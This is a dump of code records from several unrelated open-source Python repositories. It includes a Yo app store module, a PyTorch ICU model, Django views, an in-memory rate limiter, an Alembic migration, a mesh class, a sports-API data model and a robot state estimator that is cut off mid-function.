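print(np.linalg.norm(A - approx) / np.linalg.norm(A))  # tiny relative error

The rescaling keeps E[B Bᵀ] = A Aᵀ, which is why the sketch's left singular vectors approximate A's.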
for store_item in deleted:\n if store_item.username:\n _update_user_in_store(store_item.username, None)\n deleted_items = [(str(i.id), i.name, i.region) for i in deleted]\n upserted = [(str(i.id), i.name, i.region) for i in upserted]\n deleted.delete()\n clear_get_store_items_cache()\n\n return {'discarded': discarded,\n 'deleted': deleted_items, \n 'upserted': upserted}\n\n\ndef clear_get_store_items_cache():\n cache.delete_memoized(_get_store_items)\n cache.delete_memoized(_get_store_item)\n\n\ndef get_store_items(regions=None):\n store_items = _get_store_items()\n if regions:\n filtered_store_items = []\n for i in store_items:\n if i.region in regions or i.region == 'World':\n filtered_store_items.append(i)\n\n return filtered_store_items\n else:\n return store_items\n\n\ndef _update_user_in_store(username, in_store, yoall_limit=None):\n yoall_limits = str(yoall_limit) + ' per hour' if yoall_limit else None\n try:\n user = get_user(username=username)\n update_user(user, in_store=in_store, yoall_limits=yoall_limits)\n except APIError:\n message = 'Unable to update %s in_store to %s'\n message = message % (username, in_store)\n current_app.logger.warning(message)\n\n\n@cache.memoize()\ndef _get_store_items():\n return list(YoStore.objects.all().order_by('rank'))\n\n\n@cache.memoize()\ndef _get_store_item(name, region):\n try:\n item = YoStore.objects(name=name, region=region).get()\n return item\n except DoesNotExist:\n return YoStore()\n except MultipleObjectsReturned:\n return None\n\n\ndef update_store_categories(category_json):\n\n discarded = []\n upserted = []\n for i, item in enumerate(category_json):\n category = item.get('category')\n region = item.get('region')\n \n if not (category and region):\n message = 'Tried to update with incomplete information: %s %s.'\n message = message % (category, region)\n current_app.log_error(message)\n discarded.append(item)\n continue\n store_category = _get_store_category(category, region)\n if not store_category:\n message = 'Tried to update %s %s but multiple objects were returned'\n message = message % (category, region)\n current_app.log_error(message)\n discarded.append(item)\n continue\n\n store_category.category = category\n store_category.rank = i\n store_category.region = region\n store_category.save()\n\n upserted.append(store_category)\n\n deleted = StoreCategory.objects(id__nin=[str(u.id) for u in upserted])\n deleted_items = [(str(i.id), i.category, i.region) for i in deleted]\n upserted = [(str(i.id), i.category, i.region) for i in upserted]\n deleted.delete()\n clear_get_store_categories_cache()\n\n return {'discarded': discarded,\n 'deleted': deleted_items, \n 'upserted': upserted}\n\n\ndef clear_get_store_categories_cache():\n cache.delete_memoized(_get_store_categories)\n cache.delete_memoized(_get_store_category)\n\n\ndef get_store_categories(regions=None):\n store_categories = _get_store_categories()\n if regions:\n store_categories = [i for i in store_categories if i.region in regions]\n\n return store_categories\n\n\n@cache.memoize()\ndef _get_store_categories():\n return list(StoreCategory.objects.all().order_by('rank'))\n\n\n@cache.memoize()\ndef _get_store_category(category, region):\n try:\n item = StoreCategory.objects(category=category, region=region).get()\n return item\n except DoesNotExist:\n return StoreCategory()\n except MultipleObjectsReturned:\n return None\n\ndef update_watch_promo_items(promo_json):\n\n discarded = []\n upserted = []\n for i, item in enumerate(promo_json):\n username = 
item.get('username')\n\n if not username:\n message = 'Tried to update with incomplete information: %s.'\n message = message % username\n current_app.log_error(message)\n discarded.append(item)\n continue\n promo_item = _get_watch_promo_item(username)\n\n promo_item.rank = i\n promo_item.username = username\n promo_item.description = item.get('description') or None\n promo_item.url = item.get('link') or None\n promo_item.profile_picture = item.get('profilepicture') or None\n promo_item.preview_picture = item.get('previewpicture') or None\n promo_item.save()\n\n upserted.append(promo_item)\n\n deleted = WatchPromo.objects(id__nin=[str(u.id) for u in upserted])\n deleted_items = [(str(i.id), i.username) for i in deleted]\n upserted = [(str(i.id), i.username) for i in upserted]\n deleted.delete()\n clear_get_watch_promo_cache()\n\n return {'discarded': discarded,\n 'deleted': deleted_items,\n 'upserted': upserted}\n\n\ndef clear_get_watch_promo_cache():\n cache.delete_memoized(_get_watch_promo_item)\n cache.delete_memoized(get_watch_promo_items)\n\n\n@cache.memoize()\ndef get_watch_promo_items():\n return list(WatchPromo.objects.all().order_by('rank'))\n\n\n@cache.memoize()\ndef _get_watch_promo_item(username):\n try:\n item = WatchPromo.objects(username=username).get()\n return item\n except DoesNotExist:\n return WatchPromo()\n","repo_name":"YoApp/yo-api","sub_path":"yoapi/yostore.py","file_name":"yostore.py","file_ext":"py","file_size_in_byte":8311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"159010586","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import logging\n\nimport numpy as np\nimport torch\n\n\nclass MimicModel(torch.nn.Module):\n\n def __init__(\n self,\n model_type,\n input_size,\n use_attention,\n rnn_hidden_size,\n rnn_type,\n rnn_layers,\n rnn_dropout,\n rnn_bidirectional,\n lr_pooling=\"mean\",\n lr_history_window=None,\n ):\n \"\"\"Builds model.\n\n Args:\n model_type: `lr` or `rnn`.\n input_size: Dimension of input vector.\n rnn_hidden_size: Dimension of hidden embeddings.\n rnn_type: `LSTM` or `GRU`.\n num_layers: Number of layers for stacked LSTM.\n dropout: Float, dropout rate.\n rnn_bidirectional: True if using bidirectional LSTM otherwise False.\n use_attention: True if using attention mechanism otherwise False.\n lr_pooling: `concat`, `last`, `mean` or `max`.\n \"\"\"\n super(MimicModel, self).__init__()\n\n self.model_type = model_type\n self.input_size = input_size\n self.rnn_hidden_size = rnn_hidden_size\n self.rnn_type = rnn_type\n self.rnn_layers = rnn_layers\n self.rnn_dropout = rnn_dropout\n self.rnn_bidirectional = rnn_bidirectional\n self.use_attention = use_attention\n self.lr_pooling = lr_pooling\n self.lr_history_window = lr_history_window\n\n if self.rnn_type == \"lstm\":\n module = torch.nn.LSTM\n elif self.rnn_type == \"gru\":\n module = torch.nn.GRU\n else:\n raise ValueError(\"Only `LSTM` and `GRU` are supported `rnn_type`.\")\n\n if self.model_type == \"rnn\" and self.rnn_bidirectional:\n self.rnn_hidden_size = self.rnn_hidden_size // 2\n\n if self.model_type == \"rnn\":\n self.rnn_module = module(\n input_size=self.input_size,\n hidden_size=self.rnn_hidden_size,\n batch_first=True,\n num_layers=self.rnn_layers,\n dropout=self.rnn_dropout,\n bidirectional=self.rnn_bidirectional)\n\n self.rnn_linear = torch.nn.Linear(\n in_features=self.rnn_hidden_size * (self.rnn_bidirectional + 1),\n 
out_features=1)\n\n if self.use_attention:\n self.attention_layer = torch.nn.Linear(\n in_features=self.rnn_hidden_size * (self.rnn_bidirectional + 1),\n out_features=1)\n\n if self.model_type == \"lr\":\n if self.use_attention:\n self.attention_layer = torch.nn.Linear(\n in_features=self.input_size, out_features=1)\n\n self.lr_linear = torch.nn.Linear(\n in_features=self.input_size, out_features=1)\n elif self.lr_pooling == \"concat\":\n self.lr_linear = torch.nn.Linear(\n in_features=self.input_size * self.lr_history_window,\n out_features=1)\n else:\n self.lr_linear = torch.nn.Linear(\n in_features=self.input_size, out_features=1)\n return\n\n def forward(self, inputs):\n \"\"\"Performs forward computation.\n\n Args:\n inputs: (batch, sequence_length, input_size)\n\n Returns:\n logits: (batch,)\n endpoints: Dictionary of auxiliary information.\n \"\"\"\n if self.model_type == \"rnn\":\n if self.use_attention:\n return self._attentional_rnn_forward(inputs)\n else:\n return self._rnn_forward(inputs)\n elif self.model_type == \"lr\":\n if self.use_attention:\n return self._attentional_lr_forward(inputs)\n else:\n return self._lr_baseline_forward(inputs)\n else:\n raise ValueError(\"Only `lr` and `rnn` are supported `model_type`.\")\n\n def _rnn_forward(self, inputs):\n outputs, aux_states = self.rnn_module(inputs)\n output_embedding = aux_states[0]\n\n if self.rnn_bidirectional:\n output_embedding = output_embedding.transpose(0, 1).reshape(\n outputs.shape[0], self.rnn_hidden_size * 2)\n else:\n output_embedding = output_embedding.squeeze(dim=0)\n\n logits = self.rnn_linear(output_embedding).squeeze(1)\n\n endpoints = {\"outputs\": outputs, \"aux_states\": aux_states}\n\n return logits, endpoints\n\n def _attentional_rnn_forward(self, inputs):\n outputs, aux_states = self.rnn_module(inputs)\n\n attention = self.attention_layer(outputs)\n attention_score = torch.nn.functional.softmax(attention, dim=1)\n\n output_embedding = torch.sum(attention_score * outputs, dim=1)\n logits = self.rnn_linear(output_embedding).squeeze(1)\n\n endpoints = {\n \"attention_scores\": attention_score,\n \"outputs\": outputs,\n \"aux_states\": aux_states,\n }\n\n return logits, endpoints\n\n def _lr_baseline_forward(self, inputs):\n if self.lr_pooling == \"mean\":\n inputs = torch.mean(inputs, dim=1)\n elif self.lr_pooling == \"last\":\n inputs = inputs[:, -1, :]\n elif self.lr_pooling == \"concat\":\n batch_size = inputs.shape[0]\n inputs = torch.reshape(inputs, [batch_size, -1])\n elif self.lr_pooling == \"max\":\n inputs, _ = torch.max(inputs, dim=1)\n else:\n raise ValueError(\n \"Only `mean`, `last`, `concat` and `max` are supported `lr_pooling`.\")\n\n logits = self.lr_linear(inputs).squeeze(1)\n\n return logits, {}\n\n def _attentional_lr_forward(self, inputs):\n attention = self.attention_layer(inputs)\n attention_score = torch.nn.functional.softmax(attention, dim=1)\n output_embedding = torch.sum(attention_score * inputs, dim=1)\n logits = self.lr_linear(output_embedding).squeeze(1)\n endpoints = {\"attention_scores\": attention_score}\n return logits, endpoints\n","repo_name":"zhmd/monitor_icu","sub_path":"code/model_builder.py","file_name":"model_builder.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10266798385","text":"from django.shortcuts import render,HttpResponse\nfrom main_page.forms import SignupForm, ContactForm\nfrom django.core.mail import send_mail\nfrom ecomm import settings\n\nfrom 
.models import Signup\nfrom products.models import ProductFeatured\n\n\n# Create your views here.\ndef index(request):\n title = 'welcome'\n featured_image=ProductFeatured.objects.first()\n form = SignupForm(request.POST or None)\n context={'title':title,'form':form,'featured_image':featured_image}\n if form.is_valid():\n instance=form.save(commit=False)\n email= form.cleaned_data['email']\n email_save,created=Signup.objects.get_or_create(email=email)\n title = 'thank you'\n context={'title':title}\n\n\n return render(request,'index.html',context)\n\ndef contact(request):\n title='Contact Us'\n contact_info=ContactForm(request.POST or None)\n if contact_info.is_valid():\n # contact_info.save(commit=False)\n name = contact_info.cleaned_data['name']\n email= contact_info.cleaned_data['email']\n phone= contact_info.cleaned_data['phone']\n message=contact_info.cleaned_data['message']\n from_msg = settings.EMAIL_HOST_USER\n subject=('from: '+name+' email: '+email + 'phone: '+str(phone))\n\n send_mail(subject , message, from_msg,[from_msg], fail_silently=False)\n\n return render(request,'contact.html',{'contact_info':contact_info, 'title':title})","repo_name":"acamogh/django_shoppingCart","sub_path":"main_page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17560875953","text":"import threading\nimport time\nfrom collections import Counter\nfrom typing import Counter as CounterType\nfrom typing import Dict, List, Optional\n\nfrom . import MovingWindow\n\n\nclass _LockableEntry:\n __slots__ = (\"atime\", \"expiry\", \"_lock\")\n\n def __init__(self, expiry: float):\n self.atime: float = time.time()\n self.expiry: float = self.atime + expiry\n\n self._lock = threading.RLock()\n\n def acquire(self) -> None:\n self._lock.acquire()\n\n def release(self) -> None:\n self._lock.release()\n\n def __enter__(self):\n self.acquire()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.release()\n\n def __repr__(self) -> str:\n return f\"MemoryLockableEntry\" # pragma: no cover\n\n\nclass MemoryStorage:\n \"\"\"\n rate limit storage using :py:class:`collections.Counter`\n as an in memory storage for fixed and elastic window strategies,\n and a simple list to implement moving window strategy.\n \"\"\"\n\n def __init__(self) -> None:\n self.storage: CounterType[str] = Counter()\n self.expirations: Dict[str, float] = {}\n self.events: Dict[str, List[_LockableEntry]] = {}\n\n self.timer = threading.Timer(0.01, self.__expire_events)\n self.timer.start()\n\n def __expire_events(self) -> None:\n for key in list(self.events.keys()):\n for event in list(self.events[key]):\n with event:\n if event.expiry <= time.time() and event in self.events[key]:\n self.events[key].remove(event)\n\n for key in list(self.expirations.keys()):\n if self.expirations[key] <= time.time():\n self.storage.pop(key, None)\n self.expirations.pop(key, None)\n\n def __schedule_expiry(self) -> None:\n if not self.timer.is_alive():\n self.timer = threading.Timer(0.01, self.__expire_events)\n self.timer.start()\n\n def incr(self, key: str, expiry: int, elastic_expiry: bool = False) -> int:\n \"\"\"\n Increments the counter for the given rate limit key.\n\n :param key: The key to increment.\n :param expiry: Amount in seconds for the key to expire in.\n :param elastic_expiry: Whether to keep extending the rate limit window every hit.\n :return: The number of hits currently on the rate limit for the given 
key.\n \"\"\"\n\n self.get(key)\n self.__schedule_expiry()\n self.storage[key] += 1\n if elastic_expiry or self.storage[key] == 1:\n self.expirations[key] = time.time() + expiry\n return self.storage.get(key, 0)\n\n def get(self, key: str) -> int:\n \"\"\"\n Retrieve the current request count for the given rate limit key.\n\n :param key: The key to get the counter value for.\n \"\"\"\n\n if self.expirations.get(key, 0) <= time.time():\n self.storage.pop(key, None)\n self.expirations.pop(key, None)\n return self.storage.get(key, 0)\n\n def clear(self, key: str) -> None:\n \"\"\"\n Resets the rate limit for the given key.\n\n :param key: The key to clear rate limits for.\n \"\"\"\n self.storage.pop(key, None)\n self.expirations.pop(key, None)\n self.events.pop(key, None)\n\n def acquire_entry(self, key: str, limit: int, expiry: int, no_add: bool = False) -> bool:\n \"\"\"\n :param key: The rate limit key to acquire an entry in.\n :param limit: The total amount of entries allowed before hitting the rate limit.\n :param expiry: Amount in seconds for the acquired entry to expire in.\n :param no_add: If False, an entry is not actually acquired but instead serves as a 'check'.\n \"\"\"\n\n self.events.setdefault(key, [])\n self.__schedule_expiry()\n timestamp = time.time()\n entry: Optional[_LockableEntry]\n try:\n entry = self.events[key][limit - 1]\n except IndexError:\n entry = None\n\n if entry and entry.atime > timestamp - expiry:\n return False\n else:\n if not no_add:\n self.events[key].insert(0, _LockableEntry(expiry))\n return True\n\n def get_expiry(self, key: str) -> float:\n \"\"\"\n Retrieve the expected expiry time for the given rate limit key.\n\n :param key: The key to get the expiry time for.\n :return: The time at which the current rate limit for the given key ends.\n \"\"\"\n\n return self.expirations.get(key, -1)\n\n def get_num_acquired(self, key: str, expiry: int) -> int:\n \"\"\"\n returns the number of entries already acquired\n\n :param key: rate limit key to acquire an entry in\n :param expiry: expiry of the entry\n \"\"\"\n\n timestamp = time.time()\n if self.events.get(key):\n return len([k for k in self.events[key] if k.atime > timestamp - expiry])\n else:\n return 0\n\n def get_moving_window(self, key: str, limit: int, expiry: int) -> MovingWindow:\n \"\"\"\n Retrieves the starting point and the number of entries in the moving window.\n\n :param key: The rate limit key to retrieve statistics about.\n :param limit: The total amount of entries allowed before hitting the rate limit.\n :param expiry: Amount in seconds for the acquired entry to expire in.\n :return: (start of window, number of acquired entries)\n \"\"\"\n\n timestamp = time.time()\n acquired = self.get_num_acquired(key, expiry)\n for item in self.events.get(key, []):\n if item.atime > timestamp - expiry:\n return MovingWindow(item.atime, acquired)\n return MovingWindow(timestamp, acquired)\n\n def check(self) -> bool:\n \"\"\"\n Check if the connection to the storage backend is healthy.\n \"\"\"\n\n return True\n\n def reset(self) -> None:\n self.storage.clear()\n self.expirations.clear()\n self.events.clear()\n\n\n__all__ = [\n \"MemoryStorage\",\n]\n","repo_name":"djmattyg007/freiner","sub_path":"freiner/storage/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34173194315","text":"\"\"\"rename user table\n\nRevision ID: 44e9a4a2ddb5\nRevises: 63b0daed7f08\nCreate 
Date: 2023-09-07 20:34:06.547286\n\n\"\"\"\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"44e9a4a2ddb5\"\ndown_revision = \"63b0daed7f08\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n op.rename_table(\"user\", \"credere_user\")\n op.drop_constraint(\"application_action_user_id_fkey\", \"application_action\", type_=\"foreignkey\")\n op.create_foreign_key(None, \"application_action\", \"credere_user\", [\"user_id\"], [\"id\"])\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n op.rename_table(\"credere_user\", \"user\")\n op.drop_constraint(None, \"application_action\", type_=\"foreignkey\")\n op.create_foreign_key(\n \"application_action_user_id_fkey\",\n \"application_action\",\n \"user\",\n [\"user_id\"],\n [\"id\"],\n )\n # ### end Alembic commands ###\n","repo_name":"open-contracting/credere-backend","sub_path":"migrations/versions/44e9a4a2ddb5_rename_user_table.py","file_name":"44e9a4a2ddb5_rename_user_table.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"35098161665","text":"from pyglobe3d.core.common.const_attrs import ConstantAttributes\nfrom pyglobe3d.core.icosalogic.edge import Edge\nfrom pyglobe3d.core.icosalogic.grid_consts import Grid\nfrom pyglobe3d.core.icosalogic.icosahedron import Icosahedron\nfrom pyglobe3d.core.icosalogic.node import Node\nfrom pyglobe3d.core.icosalogic.triangle import Triangle\n\n\nclass Mesh(ConstantAttributes):\n def __init__(self, partition: int = 1):\n self.GRID = Grid(partition=partition)\n # 30 edges of the icosahedron:\n self.EDGES = tuple(Edge(grid=self.GRID, index=index) for index in range(0, self.GRID.NUMBER_OF_EDGES))\n # 12 icosahedron nodes:\n self.ICOSAHEDRON_NODES = Icosahedron(grid=self.GRID).icosahedron_nodes\n\n @property\n def partition(self):\n return self.GRID.PARTITION\n\n def create_node(self, index=0):\n return Node.create_node(grid=self.GRID, index=index)\n\n def create_triangle(self, index=0):\n return Triangle.create_triangle(grid=self.GRID, index=index)\n\n\nif __name__ == '__main__':\n ms = Mesh(partition=4)\n nd31 = ms.create_node(index=31)\n print('-'*10)\n for ns in nd31.neighboring_nodes:\n print(ns)\n print('-' * 10)\n for ts in nd31.adjacent_triangles:\n print(ts)\n print('-' * 10)\n tr31 = ms.create_triangle(index=31)\n print('-' * 10)\n for ns in tr31.triangle_nodes:\n print(ns)\n\n # grd = Grid(-10)\n","repo_name":"ax-va/Project-PyGlobe3D","sub_path":"pyglobe3d/core/icosalogic/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18389046436","text":"#!/usr/bin/python3\n\"\"\" this module represents a class square \"\"\"\n\n\nclass Square:\n \"\"\"Represents a square class \"\"\"\n def __init__(self, size=0):\n \"\"\"Initialize data with constructor\"\"\"\n\n if type(size) != int:\n raise TypeError(\"size must be an integer\")\n elif size < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = size\n\n @property\n def size(self):\n return self.__size\n\n @size.setter\n def size(self, new_size):\n if type(new_size) != int:\n raise TypeError(\"size must be an integer\")\n elif new_size < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = new_size\n\n def area(self):\n \"\"\" Returns the area of a square \"\"\"\n return (self.__size * self.__size)\n\n def my_print(self):\n \"\"\" 
prints # on stdout\"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__size):\n print(\"#\" * self.__size)\n","repo_name":"ChinenyeNmoh/alx-higher_level_programming","sub_path":"0x06-python-classes/5-square.py","file_name":"5-square.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40646308010","text":"# coding: utf-8\n\n\"\"\"\n College Football Data API\n\n This is an API for accessing all sorts of college football data. Please note that API keys should be supplied with \\\"Bearer \\\" prepended (e.g. \\\"Bearer your_key\\\"). API keys can be acquired from the CollegeFootballData.com website. # noqa: E501\n\n OpenAPI spec version: 4.5.1\n Contact: admin@collegefootballdata.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom cfbd.configuration import Configuration\n\n\nclass TeamFPIRatingResumeRanks(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'strength_of_record': 'int',\n 'fpi': 'int',\n 'average_win_probability': 'int',\n 'strength_of_schedule': 'int',\n 'remaining_strength_of_schedule': 'int',\n 'game_control': 'int'\n }\n\n attribute_map = {\n 'strength_of_record': 'strengthOfRecord',\n 'fpi': 'fpi',\n 'average_win_probability': 'averageWinProbability',\n 'strength_of_schedule': 'strengthOfSchedule',\n 'remaining_strength_of_schedule': 'remainingStrengthOfSchedule',\n 'game_control': 'gameControl'\n }\n\n def __init__(self, strength_of_record=None, fpi=None, average_win_probability=None, strength_of_schedule=None, remaining_strength_of_schedule=None, game_control=None, _configuration=None): # noqa: E501\n \"\"\"TeamFPIRatingResumeRanks - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._strength_of_record = None\n self._fpi = None\n self._average_win_probability = None\n self._strength_of_schedule = None\n self._remaining_strength_of_schedule = None\n self._game_control = None\n self.discriminator = None\n\n if strength_of_record is not None:\n self.strength_of_record = strength_of_record\n if fpi is not None:\n self.fpi = fpi\n if average_win_probability is not None:\n self.average_win_probability = average_win_probability\n if strength_of_schedule is not None:\n self.strength_of_schedule = strength_of_schedule\n if remaining_strength_of_schedule is not None:\n self.remaining_strength_of_schedule = remaining_strength_of_schedule\n if game_control is not None:\n self.game_control = game_control\n\n @property\n def strength_of_record(self):\n \"\"\"Gets the strength_of_record of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The strength_of_record of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._strength_of_record\n\n @strength_of_record.setter\n def strength_of_record(self, strength_of_record):\n \"\"\"Sets the strength_of_record of this TeamFPIRatingResumeRanks.\n\n\n :param strength_of_record: The strength_of_record of this TeamFPIRatingResumeRanks. 
# noqa: E501\n :type: int\n \"\"\"\n\n self._strength_of_record = strength_of_record\n\n @property\n def fpi(self):\n \"\"\"Gets the fpi of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The fpi of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._fpi\n\n @fpi.setter\n def fpi(self, fpi):\n \"\"\"Sets the fpi of this TeamFPIRatingResumeRanks.\n\n\n :param fpi: The fpi of this TeamFPIRatingResumeRanks. # noqa: E501\n :type: int\n \"\"\"\n\n self._fpi = fpi\n\n @property\n def average_win_probability(self):\n \"\"\"Gets the average_win_probability of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The average_win_probability of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._average_win_probability\n\n @average_win_probability.setter\n def average_win_probability(self, average_win_probability):\n \"\"\"Sets the average_win_probability of this TeamFPIRatingResumeRanks.\n\n\n :param average_win_probability: The average_win_probability of this TeamFPIRatingResumeRanks. # noqa: E501\n :type: int\n \"\"\"\n\n self._average_win_probability = average_win_probability\n\n @property\n def strength_of_schedule(self):\n \"\"\"Gets the strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._strength_of_schedule\n\n @strength_of_schedule.setter\n def strength_of_schedule(self, strength_of_schedule):\n \"\"\"Sets the strength_of_schedule of this TeamFPIRatingResumeRanks.\n\n\n :param strength_of_schedule: The strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n :type: int\n \"\"\"\n\n self._strength_of_schedule = strength_of_schedule\n\n @property\n def remaining_strength_of_schedule(self):\n \"\"\"Gets the remaining_strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The remaining_strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._remaining_strength_of_schedule\n\n @remaining_strength_of_schedule.setter\n def remaining_strength_of_schedule(self, remaining_strength_of_schedule):\n \"\"\"Sets the remaining_strength_of_schedule of this TeamFPIRatingResumeRanks.\n\n\n :param remaining_strength_of_schedule: The remaining_strength_of_schedule of this TeamFPIRatingResumeRanks. # noqa: E501\n :type: int\n \"\"\"\n\n self._remaining_strength_of_schedule = remaining_strength_of_schedule\n\n @property\n def game_control(self):\n \"\"\"Gets the game_control of this TeamFPIRatingResumeRanks. # noqa: E501\n\n\n :return: The game_control of this TeamFPIRatingResumeRanks. # noqa: E501\n :rtype: int\n \"\"\"\n return self._game_control\n\n @game_control.setter\n def game_control(self, game_control):\n \"\"\"Sets the game_control of this TeamFPIRatingResumeRanks.\n\n\n :param game_control: The game_control of this TeamFPIRatingResumeRanks. 
# noqa: E501\n :type: int\n \"\"\"\n\n self._game_control = game_control\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(TeamFPIRatingResumeRanks, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, TeamFPIRatingResumeRanks):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, TeamFPIRatingResumeRanks):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"CFBD/cfbd-python","sub_path":"cfbd/models/team_fpi_rating_resume_ranks.py","file_name":"team_fpi_rating_resume_ranks.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"40348990374","text":"\"\"\"State estimator.\"\"\"\nimport numpy as np\nimport pybullet as p\nfrom typing import Any, Sequence\n\nfrom src.robots import a1_robot\nfrom src.convex_mpc_controller.gait_generator import LegState\nfrom src.utilities.moving_window_filter import MovingWindowFilter\n\n_DEFAULT_WINDOW_SIZE = 20\n\n\nclass COMVelocityEstimator(object):\n \"\"\"Estimate the CoM velocity using on board sensors.\n\n\n Requires knowledge about the base velocity in world frame, which for example\n can be obtained from a MoCap system. 
This estimator will filter out the high\n frequency noises in the velocity so the results can be used with controllers\n reliably.\n\n \"\"\"\n def __init__(self,\n robot: Any,\n velocity_window_size: int = _DEFAULT_WINDOW_SIZE,\n ground_normal_window_size: int = _DEFAULT_WINDOW_SIZE):\n self._robot = robot\n self._velocity_window_size = velocity_window_size\n self._ground_normal_window_size = ground_normal_window_size\n self._last_desired_leg_state = [LegState.STANCE] * 4\n self._swing_force_history = [[], [], [], []]\n self._ground_normal = np.array([0., 0., 1.])\n self.reset(0)\n\n def reset(self, current_time):\n del current_time\n # We use a moving window filter to reduce the noise in velocity estimation.\n self._velocity_filter = MovingWindowFilter(\n window_size=self._velocity_window_size)\n self._ground_normal_filter = MovingWindowFilter(\n window_size=self._ground_normal_window_size)\n\n self._com_velocity_world_frame = np.array((0, 0, 0))\n self._com_velocity_body_frame = np.array((0, 0, 0))\n\n def _compute_ground_normal(self, contact_foot_positions):\n \"\"\"Computes the surface orientation in robot frame based on foot positions.\n Solves a least squares problem, see the following paper for details:\n https://ieeexplore.ieee.org/document/7354099\n \"\"\"\n contact_foot_positions = np.array(contact_foot_positions)\n normal_vec = np.linalg.lstsq(contact_foot_positions, np.ones(4))[0]\n normal_vec /= np.linalg.norm(normal_vec)\n if normal_vec[2] < 0:\n normal_vec = -normal_vec\n return normal_vec\n\n def update(self, desired_leg_state):\n # Update foot force calibration\n if isinstance(self._robot, a1_robot.A1Robot):\n for leg_id in range(4):\n if desired_leg_state[leg_id] == LegState.SWING:\n self._swing_force_history[leg_id].append(\n self._robot.foot_forces[leg_id])\n if desired_leg_state[\n leg_id] == LegState.STANCE and self._last_desired_leg_state[\n leg_id] == LegState.SWING:\n # Transition from swing to stance, update sensor calibration\n avg_swing_force = np.mean(self._swing_force_history[leg_id])\n self._robot.update_foot_contact_force_threshold(\n leg_id, avg_swing_force + 10)\n self._swing_force_history[leg_id] = []\n self._last_desired_leg_state = desired_leg_state\n\n # Update velocity\n velocity = np.array(self._robot.base_velocity)\n self._com_velocity_world_frame = self._velocity_filter.calculate_average(\n velocity)\n\n base_orientation = self._robot.base_orientation_quat\n _, inverse_rotation = self._robot.pybullet_client.invertTransform(\n (0, 0, 0), base_orientation)\n\n self._com_velocity_body_frame, _ = (\n self._robot.pybullet_client.multiplyTransforms(\n (0, 0, 0), inverse_rotation, self._com_velocity_world_frame,\n (0, 0, 0, 1)))\n\n ground_normal_vector = self._compute_ground_normal(\n self._robot.foot_contact_history)\n self._ground_normal = self._ground_normal_filter.calculate_average(\n ground_normal_vector)\n self._ground_normal /= np.linalg.norm(self._ground_normal)\n\n @property\n def com_position_ground_frame(self):\n foot_contacts = self._robot.foot_contacts.copy()\n if 